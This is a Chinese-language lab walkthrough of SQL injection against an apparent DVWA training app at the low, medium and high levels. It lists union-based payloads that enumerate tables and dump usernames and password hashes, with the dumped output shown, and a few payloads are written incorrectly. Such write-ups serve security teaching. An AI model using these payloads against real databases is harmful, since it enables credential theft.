SQL注入

1、 SQL注入。

切到SQL Injection 模块：

 

 

 

 

1.1 low

1' order by 2#

 

 

 

 

 

 

1' union select 1,2#

 

 

 

 

 

1' select 1,database()#

 

 

 

输入“1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #”

 

 

 

 

 

 

 

3.2.2 medium

打开抓包工具BurpLoader.jar

 

 

 

 

 

设置代理：

 

 

 

1 order by 2#

 

 

 

 

 

 

 

 

 

 

1 union select 1,2#

 

 

 

 

 

 

 

 

 

 

1 union select 1,column_name from information_schema.columns where table='0×7573657273'

 

 

 

 

 

 

 

 

 

 

 

 

 

 

输入

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

 

 

 

 

 

 

ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: admin
Surname: admin

 

ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Gordon
Surname: Brown

 

ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Hack
Surname: Me

 

ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Pablo
Surname: Picasso

 

ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: Bob
Surname: Smith

 

ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

 

这样就得到了users表中所有用户的user_id,first_name,last_name,password的数据。

 

3.2.3 high

1' order by 2#

 

 

 

 

 

 

1' union select 1,database()#